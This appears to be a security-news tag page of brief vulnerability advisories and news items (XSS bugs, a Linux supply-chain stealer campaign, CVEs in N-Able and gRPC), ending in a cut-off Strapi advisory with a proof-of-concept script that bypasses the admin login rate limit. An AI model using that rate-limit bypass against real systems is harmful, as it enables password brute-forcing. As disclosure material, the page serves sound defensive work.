Tag
islamnt CMS version 2.1.0 suffers from a cross site scripting vulnerability.
Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.
A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack. The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active. "
ImgHosting version 1.3 suffers from a cross site scripting vulnerability.
Employee offboarding is no one’s favorite task, yet it is a critical IT process that needs to be executed diligently and efficiently. That’s easier said than done, especially considering that IT organizations have less visibility and control over employees’ IT use than ever. Today, employees can easily adopt new cloud and SaaS applications whenever and wherever they want, and the old IT
A high-severity security flaw has been disclosed in N-Able's Take Control Agent that could be exploited by a local unprivileged attacker to gain SYSTEM privileges. Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows
The Awesome Weather Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'awesome-weather' shortcode in versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Categories: Apple Categories: News Tags: Wonderlust Tags: iPhone Tags: iCloud Tags: backup Tags: 2FA Tags: Apple D Tags: trusted device Has the launch of the iPhone 15 triggered a yearning to upgrade to a new model? Here are some tips to consider during transfer. (Read more...) The post Upgrading your iPhone? Read this first appeared first on Malwarebytes Labs.
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected.
### 1. Summary There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. ### 2. Details It is possible to avoid this by modifying the rate-limited request path as follows. 1. Manipulating request paths to upper or lower case. (Pattern 1) - In this case, avoidance is possible with various patterns. 2. Add path slashes to the end of the request path. (Pattern 2) ### 3. PoC Access the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen. #### Pattern 1 (uppercase and lowercase) ```js // poc.js (async () => { const data1 = { email: "[email protected]", // registered e-mail address password: "invalid_password", }; const data2 = { email: "[email protected]", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), ...